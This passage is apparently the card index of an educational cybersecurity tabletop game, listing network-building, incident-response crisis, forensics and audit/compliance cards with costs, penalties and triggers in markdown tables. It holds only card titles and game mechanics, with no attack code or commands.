| ARCH-02 | Segmented 3-Zone (DMZ Model) | 5 | 2/5 |
| ARCH-03 | Fully Isolated (Zero Trust Model) | 12 | 4/5 |
| ARCH-04 | Cloud Hybrid (Mixed On-Premises & Cloud) | 8 | 3/5 |
| ARCH-05 | Cloud First (Cloud-Only Infrastructure) | 6 | 2/5 |
| Card ID | Title | Criticality | Fulfilled By |
|---|---|---|---|
| ASSET-01 | | High | SRV-01 |
| ASSET-02 | Web | Medium | SRV-02 |
| ASSET-03 | Database | Very High | SRV-03 |
| ASSET-04 | File Storage | High | SRV-04 |
| ASSET-05 | Identity | Very High | SRV-05 |
| ASSET-06 | Development | Medium | SRV-06 |
| ASSET-07 | Disaster Recovery | Very High | SRV-07 |
| ASSET-08 | VPN/Remote Access | Medium | SEC-05 |
| Card ID | Title | Cost | Key Challenge |
|---|---|---|---|
| LEGACY-01 | Mainframe System | 15 | Cannot patch, mission-critical |
| LEGACY-02 | Custom Business Application | 8 | Vendor no longer exists |
| LEGACY-03 | Industrial Control System (ICS) | 12 | Real-time + safety-critical |
| LEGACY-04 | Obsolete Operating System | 5 | All vulnerabilities public |
| Card ID | Title | Cost | Primary Benefit |
|---|---|---|---|
| CLOUD-01 | Containerized Microservices | 6 | Scalability & Velocity |
| CLOUD-02 | Serverless/Function-as-a-Service | 3 | Simplicity & Cost |
| CLOUD-03 | Database-as-a-Service (Managed Database) | 5 | Reliability & Compliance |
| CLOUD-04 | Content Delivery Network (CDN) | 4 | Performance & DDoS Protection |
| Card ID | Title | Satisfied By | Missed Penalty |
|---|---|---|---|
| REQ-01 | New Product Launch Website | Web Server or cloud web | -5 |
| REQ-02 | Customer Data Acquisition | Database (dedicated or cloud) | -10 |
| REQ-03 | Work-From-Home Program | VPN Gateway | -3 |
| REQ-04 | Remote Workforce Mandate | VPN Gateway + Domain Controller | -5 |
| REQ-05 | HIPAA Compliance Mandate | Backup + segmentation | -10 |
| REQ-06 | PCI Scope: Cardholder Data | Database + Firewall/Segmentation | -10 |
| REQ-07 | 99.9% Uptime SLA | Load Balancer or duplicate server | -5 |
| REQ-08 | M&A: Integrate Acquired Network | 2 spare slots or new server | -10 |
| REQ-09 | Scale Email System | 2nd Email Server / LB / cloud email | -5 |
| REQ-10 | Security Audit Ordered | SIEM, or IDS + Email Gateway | -5 |
| REQ-11 | Board Demands IR Readiness | IDS, IPS, or SIEM | -10 |
| REQ-12 | Ransomware Wave in Sector | Backup + detection | -20 |
| REQ-13 | New Subsidiary Office | VPN Gateway | -5 |
| REQ-14 | E-Commerce Expansion | Web + WAF | -5 |
| REQ-15 | Developer Hiring Spree | Dev Server or overload | -3 |
| REQ-16 | Records-Retention Regulation | File storage + Backup | -5 |
| REQ-17 | Single Sign-On Rollout | Domain Controller | -5 |
| REQ-18 | Cyber-Insurance Renewal | Backup + Email Gateway + detection | -5 (met: +5) |
| REQ-19 | Threat-Intel Pilot | Honeypot | 0 (met: +5) |
| REQ-20 | Data-Center Consolidation | Any cloud-hosted service | -3 (met: +3) |
| Card ID | Title | Effect (Unmitigated) | Mitigated By |
|---|---|---|---|
| EVT-01 | Email Server Failure | Pay 5 or -10 pts | Redundant/cloud email |
| EVT-02 | Traffic Spike | -5 pts (or +5 if ready) | LB / CDN / redundant web |
| EVT-03 | Phishing Wave | -10 pts (or +5 if ready) | Email Gateway |
| EVT-04 | Cloud Vendor Outage | -5 pts if cloud-only service | On-prem redundancy |
| EVT-05 | Budget Cut | -5 Budget | Contingency reserve |
| EVT-06 | Emergency Funds | +10 Budget | — |
| EVT-07 | Security Grant | +5 Budget if Backup | — |
| EVT-08 | File Server Filling Up | Buy capacity or -5 pts | Spare capacity |
| EVT-09 | Honeypot Triggers | +5 pts if honeypot | — |
| EVT-10 | Insider Snooping | -5 pts (or +5 if ready) | SIEM / segmentation |
| EVT-11 | Ransomware Strikes | -20 pts | Backup (+ detection: +5) |
| EVT-12 | IT Staff Burnout | Max 1 deploy this turn | Completed builds |
| EVT-13 | Vendor Promotion | Next device -2 cost | — |
| EVT-14 | New Hire Needs Remote Access | -3 pts | VPN Gateway |
| EVT-15 | Hardware Recall | Pay 3 or server offline | Redundancy / cloud |
| EVT-16 | Quiet Quarter | Nothing | — |
Module total: 38 cards (30 core + 8 expansion scenarios).
| Deck | File | Card IDs | Count | Description |
|---|---|---|---|---|
| Crisis Actions | crisis-action-cards.md | ACTION-01 – ACTION-13 | 13 | Investigation, Remediation, Communication actions plus the Ransom Decision |
| Event Timeline | event-cards.md | EVENT-01 – EVENT-12 | 12 | 6 Scheduled + 6 Triggered crisis events on the 8-turn Crisis Clock |
| Stakeholders | stakeholder-cards.md | STAKE-01 – STAKE-05 | 5 | Trust meters for the five stakeholder groups |
| Advanced Scenarios (exp.) | advanced-scenarios.md | SCENARIO-01 – SCENARIO-08 | 8 | High/extreme-difficulty crisis setups |
| Card ID | Title | Category | Cost | Advance | Duration |
|---|---|---|---|---|---|
| ACTION-01 | Forensic Analysis | Investigation | 12 | +25% | 2 turns |
| ACTION-02 | Threat Hunting | Investigation | 8 | +15% | 1 turn |
| ACTION-03 | Log Analysis | Investigation | 5 | +10% | 1 turn |
| ACTION-04 | Third-Party Incident Response Engagement | Investigation | 20 | +30% Inv / +20% Rem | 3 turns |
| ACTION-05 | Patch & Harden (Affected Systems) | Remediation | 10 | +20% | 1 turn |
| ACTION-06 | Containment (Isolate Compromised Systems) | Remediation | 8 | +15% | 1 turn |
| ACTION-07 | System Rebuild/Recovery from Backup | Remediation | 15 | +25% | 2 turns |
| ACTION-08 | Change Credentials & Access Controls | Remediation | 6 | +12% | 1 turn |
| ACTION-09 | Customer Notification | Communication | 10 | +20% | 1 turn |
| ACTION-10 | Regulatory/Law Enforcement Notification | Communication | 8 | +10% | 1 turn |
| ACTION-11 | Media/Public Relations Management | Communication | 12 | +15% | 1 turn |
| ACTION-12 | Board & Shareholder Communication | Communication | 9 | +12% | 1 turn |
| ACTION-13 | Ransom Decision (v2.2) | Crisis Decision | 0/5/20 | Pay: +20% Rem | Instant (once per game) |
Standing rule (not a card): the free Holding Statement — Communication, 0 Budget, +5%.
| Card ID | Title | Kind | Turn / Trigger |
|---|---|---|---|
| EVENT-01 | First Media Coverage | Scheduled | Turn 2 |
| EVENT-02 | Regulatory 72-Hour Deadline | Scheduled | Turn 6 (deadline Turn 8) |
| EVENT-03 | Customer Notification Window | Scheduled | Turn 5 |
| EVENT-04 | Board Meeting | Scheduled | Turn 3 |
| EVENT-05 | Customer Class Action Lawsuit | Triggered | Customers un-notified after T5 or trust <20% |
| EVENT-06 | Regulatory Fine | Triggered | Regulator trust <20% |
| EVENT-07 | Media Frenzy | Triggered | Media <20% or silent through T3 |
| EVENT-08 | Second Breach Discovered | Triggered | T6: Remediation <30%, no rebuild |
| EVENT-09 | Shareholder Pressure | Scheduled | Turn 5 (public co.) |
| EVENT-10 | Competitor Advantage | Triggered | Customer trust <40% from T5 |
| EVENT-11 | Key Executive Resignation | Triggered | Executive trust <30% |
| EVENT-12 | Government Subpoena | Scheduled | Turn 7 (med/large org) |
| Card ID | Title | Type | Starting Trust |
|---|---|---|---|
| STAKE-01 | Customers | External | 50% |
| STAKE-02 | Regulators | Government | 60% |
| STAKE-03 | Media / Public | External | 40% |
| STAKE-04 | Board of Directors | Internal | 70% |
| STAKE-05 | Executive Leadership | Internal | 80% |
| Card ID | Title | Difficulty | Key Pressure |
|---|---|---|---|
| SCENARIO-01 | Multi-Region Breach with Data Sovereignty Issues | HIGH | 3 different regulatory timelines |
| SCENARIO-02 | Ransomware with Extortion Threat | HIGH | $10M decision + data publication threat |
| SCENARIO-03 | Supply Chain Compromise (Vendor Breach Affects Customers) | HIGH | Vendor failure, customer trust |
| SCENARIO-04 | Insider Threat Revealed Mid-Crisis | HIGH | Organizational trust collapse |
| SCENARIO-05 | Critical Infrastructure Breach (Safety/Lives at Risk) | EXTREME | Lives at risk, government control |
| SCENARIO-06 | Stock Price Crash (Public Company Panic) | HIGH | Financial crisis + board pressure |
| SCENARIO-07 | Ransomware + Data Breach + Business Email Compromise | EXTREME | 3 simultaneous attacks, multiple ransoms |
| SCENARIO-08 | Breach During Merger/Acquisition | EXTREME | Deal value + regulatory blocks |
Module total: 28 core cards (12 Investigation + 12 Evidence + 4 Findings). Expansion deck: PLANNED — not yet available (no card file exists yet; see the module README's design notes).
| Deck | File | Card IDs | Count | Description |
|---|---|---|---|---|
| Investigation Actions | investigation-cards.md | DISK-01/02, MEM-01/02, LOG-01/02, NET-01/02, MALW-01/02, TIMELINE-01, THREAT-01 | 12 | Forensic techniques rolled d20 vs DC, with Budget cost and Duration |
| Evidence & Findings | evidence-cards.md | EVD-01 – EVD-12, FIND-01 – FIND-04 | 16 | Discovered evidence artifacts and synthesis/conclusion cards |
| Card ID | Title | DC | Cost | Duration |
|---|---|---|---|---|
| DISK-01 | Disk Image & Analysis | 12 | 10 | 2 turns (rush: +5 Budget for 1) |
| DISK-02 | File System Carving | 14 | 15 | 3 turns |
| MEM-01 | Memory Dump & Analysis | 13 | 15 | 2 turns |
| MEM-02 | Memory Forensics Deep Dive | 15 | 20 | 3 turns |
| LOG-01 | Event Log Analysis | 11 | 5 | 1 turn |
| LOG-02 | Deep Log Correlation | 13 | 10 | 2 turns |
| NET-01 | Network Traffic Analysis | 12 | 10 | 2 turns |
| NET-02 | Packet Capture Deep Analysis | 14 | 15 | 3 turns |
| MALW-01 | Malware Analysis (Dynamic) | 12 | 15 | 2 turns |
| MALW-02 | Malware Analysis (Static) | 14 | 10 | 2 turns |
| TIMELINE-01 | Timeline Reconstruction | 13 | 5 | 1 turn |
| THREAT-01 | Threat Attribution Analysis | 15 | 20 | 3 turns |
| Card ID | Title | Type |
|---|---|---|
| EVD-01 | Credential Dumper Malware | Malware & Persistence |
| EVD-02 | Command-and-Control Callback Domain | Attack Infrastructure |
| EVD-03 | Persistence Mechanism (Scheduled Task) | Malware & Persistence |
| EVD-04 | Suspicious Admin Login (Timeline) | Credentials & Access |
| EVD-05 | Lateral Movement Evidence (Pass-the-Hash) | Lateral Movement |
| EVD-06 | Data Exfiltration Evidence | Exfiltration |
| EVD-07 | Attacker Infrastructure Map | Attack Infrastructure |
| EVD-08 | Encryption Keys Recovered | Malware & Persistence |
| EVD-09 | Attacker Command History | Attack Activity |
| EVD-10 | Malware Behavior Profile | Malware & Persistence |
| EVD-11 | File Staging Artifacts | Attack Activity |
| EVD-12 | Anti-Forensics Evidence | Attack Activity |
| Card ID | Title | Triggered When |
|---|---|---|
| FIND-01 | Threat Attribution Report | Attribution Confidence ≥ 70% |
| FIND-02 | Attack Surface Analysis | Attack Chain ≥ 75% |
| FIND-03 | Persistence Mechanisms Discovered | Multiple persistence artifacts found |
| FIND-04 | Investigative Gaps & Recommendations | Investigation completes (Victory or Failure) |
Module total: 25 cards (6 core + 19 expansion). The expansion — 11 framework cards and 8 remediation cards — lives entirely in one file.
| Deck | File | Card IDs | Count | Description |
|---|---|---|---|---|
| Audit Domains | audit-domain-cards.md | DOMAIN-01 – DOMAIN-06 | 6 | Domain assessments scored 1-5 stars with PASS/FAIL mapping |
| Frameworks & Remediation (exp.) | compliance-frameworks.md | FRAMEWORK-NIST-01–05, FRAMEWORK-CIS-01–03, FRAMEWORK-PCI-01–03, REMEDIATION-01–08 | 19 | Framework assessment variants (5 NIST + 3 CIS + 3 PCI) plus 8 remediation actions |
| Card ID | Title | Focus |
|---|---|---|
| DOMAIN-01 | Network Segmentation & Isolation | Network zones, lateral movement prevention |
| DOMAIN-02 | Access Control & Identity Management | MFA, credential policy |
| DOMAIN-03 | Threat Detection & Incident Response | SIEM, breach detection |
| DOMAIN-04 | Backup & Disaster Recovery | Backups, ransomware resilience |
| DOMAIN-05 | Third-Party Risk & Cloud Security | Vendor and supply chain risk |
| DOMAIN-06 | Security Operations & Monitoring | Security team, sustained posture |
| Card ID | Title | Focus |
|---|---|---|
| FRAMEWORK-NIST-01 | Identify Function | Asset inventory and risk assessment |
| FRAMEWORK-NIST-02 | Protect Function | Preventive security controls |
| FRAMEWORK-NIST-03 | Detect Function | Detecting attacks as they happen |
| FRAMEWORK-NIST-04 | Respond Function | Responding to breaches/attacks |
| FRAMEWORK-NIST-05 | Recover Function | Recovery and improvement |
| FRAMEWORK-CIS-01 | Safeguards 1-6 (Foundations) | Basic security practices |
| FRAMEWORK-CIS-02 | Safeguards 7-13 (Advanced Defenses) | IR, supply chain, defense tools |
| FRAMEWORK-CIS-03 | Safeguards 14-18 (Operations & Governance) | Operational controls |
| FRAMEWORK-PCI-01 | Infrastructure Security (Requirements 1-4) | Network/system security for cardholder data |
| FRAMEWORK-PCI-02 | Access & Operations (Requirements 5-10) | Access control and operations |
| FRAMEWORK-PCI-03 | Testing & Compliance (Requirements 11-12) | Testing, monitoring, compliance management |
| Card ID | Title | Cost |
|---|---|---|
| REMEDIATION-01 | Implement MFA | 5 |
| REMEDIATION-02 | Deploy SIEM | 15 |
| REMEDIATION-03 | Implement Network Segmentation | 12 |
| REMEDIATION-04 | Backup & Disaster Recovery | 10 |
| REMEDIATION-05 | Security Training Program | 3 |
| REMEDIATION-06 | Vendor Security Assessment | 5 |
| REMEDIATION-07 | Vulnerability Management Program | 8 |
| REMEDIATION-08 | Incident Response Plan & Team | 12 |
| Module | Core | Expansion | Standalone | Total |
|---|---|---|---|---|
| Incident Response | 12 threats + 24 defenses* | 8 threats + 19 defenses | — | 63 |
| Hardening | 8 tactics (+ shared 24 defenses*) | 8 tactics | — | 16 (+24 shared) |
| Network Building | 33 | 8 | 36 | 77 |
| Disaster Recovery | 30 | 8 | — | 38 |
| Forensics | 28 | planned | — | 28 |
| Audit & Compliance | 6 | 19 | — | 25 |
* The 24 defense cards (D-01 – D-24) are one shared deck counted once (under Incident Response) in the 247-card grand total.
All cards are licensed under CC BY-NC-SA 4.0 (Creative Commons Attribution-NonCommercial-ShareAlike).